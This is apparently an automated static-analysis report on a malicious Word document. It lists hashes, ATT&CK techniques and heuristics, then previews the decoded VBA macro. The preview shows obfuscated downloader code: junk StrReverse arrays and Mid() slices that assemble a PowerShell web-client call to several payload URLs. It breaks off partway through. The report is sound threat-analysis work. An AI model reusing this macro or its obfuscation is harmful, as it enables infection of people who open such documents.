Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bcfec6d15696c5b7…

MALICIOUS

Office (OLE)

Size: 132.1 KB
First seen: 2018-02-07
MD5: 2c48ce765abc460a4ac223fb8c121756
SHA-1: 972c1546ca21209734e0dbefaf84a89be76e3261
SHA-256: bcfec6d15696c5b79f5741e9b9f374246ad897bafc9b0f6ca2335004777b717d
Risk Score: 222

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1203 Exploitation for Client Execution
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that utilizes the Shell() command, indicating an attempt to execute arbitrary code. The presence of a 'Password-protected archive handoff' heuristic suggests the document's purpose is to lure the user into handling a separate, encrypted payload. The reconstructed URL 'http://gXw+gXwtagXw+gXwswines.co' is likely part of the malicious infrastructure.

Heuristics (7)

  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 135,257 bytes but its declared streams total only 24,487 bytes — 110,770 bytes (82%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • URL http://gXw+gXwtagXw+gXwswines.co found in document text (OLE body)
    • URL http://schemas.openxmlformats.org/drawingml/2006/main found in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                               Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)  52881 bytes
SHA-256: 4ff8e304e3d17e4b953a4806f2431a5822578f4d3d90633043913c794bca2217
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HpaCWEKWi"
Function wbGowvEQG()
jMhKzt = Array(StrReverse("oLGXEAjqiE"), StrReverse("jqaWvnIufr"), StrReverse("phbrROzqiG"), StrReverse("JBkTTumHkc"), StrReverse("DsrSTVkrwN"), StrReverse("obZhnHkOGq"), StrReverse("DqLcuiFGCB"), StrReverse("ABKDnwpIYw"))
lVPYXfAmZC = Mid("Y+3MgXw+gXwciligXw+gXwk.gXw+gXwxyz/gXw3'+'Mg+3M'+'g+gXwSkRagptgXw+gX3Mg+3MgwdGgXw+gXw/,gXw+gXwhttp:gXw+gXw//rgXw+gXwandevu-gXw+gXwdk.rgX3Mg+3Mgw+gXwu'+'/q3Mg+3Mg/gXw+gXw,ht3Mg+3Mgtp://sagXw+gXwlgXuMv1FrYS60", 2, 195)
BpBcRXwONUS = Array(StrReverse("kUKwEPuiTo"), StrReverse("AFMGtKhttj"), StrReverse("kFNBBvJBAd"), StrReverse("MPWmjqzWfB"), StrReverse("jnjIcZHzuc"), StrReverse("ZLifDfGJwI"), StrReverse("FsipckjaWC"), StrReverse("LKOsAwVFYc"))
twStRjJzrpj = Array(StrReverse("dFtRSibCjM"), StrReverse("JXAtZNjPYl"), StrReverse("PiovMmQWtq"), StrReverse("RcqKNzwuJL"), StrReverse("GDZqrdAQia"), StrReverse("QaknhwQwFf"), StrReverse("SFJquhhqjb"), StrReverse("RmFNiMEwEj"))
ioXOW = Array(StrReverse("juDjCYOAjS"), StrReverse("DYfUiTkEwh"), StrReverse("OiqspODMXV"), StrReverse("iwhUPbRNFw"), StrReverse("zDjSYOYzIC"), StrReverse("hsUaaCDKqo"), StrReverse("UCdOoGrKFH"), StrReverse("BXzChLuYUa"))
zAEZZvWSqU = Mid("ZVaBzZ3AWYuWDX3Kiww-object randomgXw+3Mg+3MggXw;O3Mg+3MggXw+gXwAYbcd = taYhttp://gXw+gXwtagXw+gXwswines.co'+'.uk/AgXw+gXwFh/,htgXw+'+'gXwtp:gXw+gXw/gXw+gXwPm2HanXclsu4wnmtPTzQ7", 18, 138)
OuzhKTW = Array(StrReverse("lzrTZqsCdO"), StrReverse("jwpitBtivK"), StrReverse("wKkCIdVWJV"), StrReverse("uStWtSNpQD"), StrReverse("oiNSvTzbTc"), StrReverse("SVDtmbPoKw"), StrReverse("VVtIUOETkb"), StrReverse("nDSrVRzSHp"))
aioEDvUTd = Array(StrReverse("qFDUnlcHtM"), StrReverse("XHWRbwaViS"), StrReverse("XOsBAJsSsP"), StrReverse("IfqQwOzIaC"), StrReverse("djQskuAiak"), StrReverse("kYuCCcMCUd"), StrReverse("sKOiErQFSM"), StrReverse("zSvboozARG"))
ELsVQow = Array(StrReverse("oiBrvTAMkG"), StrReverse("nolmNoCtFV"), StrReverse("oDXqXFYrmb"), StrReverse("LcbjYcQjDY"), StrReverse("ozpVnKcAHz"), StrReverse("wINjzkHKUq"), StrReverse("uIZJuLNCOk"), StrReverse("XTqjhpOBDM"))
NjLrtmGcvoC = Mid("VTdTLivUVzjn984Qw+0wjh2nSiJt9r5I1", 17, 2)
DpJSAIJu = Array(StrReverse("JKrIfklnNW"), StrReverse("BzowJSUmos"), StrReverse("duPNmSdSNO"), StrReverse("iMlNUiTGzU"), StrReverse("GcswLAiwRW"), StrReverse("TLMYcOuiVM"), StrReverse("GSawrpLabb"), StrReverse("zOmUlACSCm"))
zAkpHhk = Array(StrReverse("cYkpdDOvlo"), StrReverse("VGOMifZjac"), StrReverse("zamWZiRjzH"), StrReverse("WFHHNWYjfr"), StrReverse("wSQZPREiCB"), StrReverse("PhbaPClNQz"), StrReverse("livdSQzHzH"), StrReverse("HpBiffJMHI"))
DdJlNuqAd = Array(StrReverse("DLRdbVUzSz"), StrReverse("pUtTWCjGWK"), StrReverse("rKNUGkWawq"), StrReverse("sSLGNvSIhw"), StrReverse("rHtJSqfjIJ"), StrReverse("TcTNFtzwWr"), StrReverse("zuAbEXImFa"), StrReverse("jYYaTjRDBQ"))
kwHZRoU = Mid("uO2rX476l6cXw +gXw+gXw tagXw+gXwYm2CtaY + OAYkgXw+gXwargnn", 12, 45)
kizNO = Array(StrReverse("ZniwsodjsK"), StrReverse("kKTjGOWmHz"), StrReverse("Sziutajtuk"), StrReverse("sZFIZwDzld"), StrReverse("mSOoWwWUcR"), StrReverse("IXEIqcIjER"), StrReverse("HklIRLELHI"), StrReverse("KYAiMzjqYz"))
PipKGCXI = Array(StrReverse("EqSmXQwwBU"), StrReverse("wVlqzzGRFv"), StrReverse("htaiZuEttV"), StrReverse("btvGmJbOEo"), StrReverse("ZKklcNnidW"), StrReverse("dzwGiKPkMc"), StrReverse("MEEfsEaiDn"), StrReverse("VsMRVXIpGM"))
Ujbok = Array(StrReverse("sCrkswcvbV"), StrReverse("ANNictisCa"), StrReverse("PrdDTulVSX"), StrReverse("znjwPmXTVa"), StrReverse("qSYmlTKnzV"), StrReverse("SJAUJBZnQz"), StrReverse("NHcEYNjQPp"), StrReverse("WOXbjwSqSA"))
WOjUzTGfzat = Mid("nuMsGPrzJi59bhWKJCsYIEdPt .( $ShELLII63Ft9iYXSQj", 26, 11)
kWBCRnvF = Array(StrReverse("HVQWsbvoYb"), StrReverse("trBccUFFsX"), StrReverse("nIfpBknjkK"), StrReverse("CZdAUqoinQ"), StrReverse("ImGbudrkpA"), StrRev
... (truncated)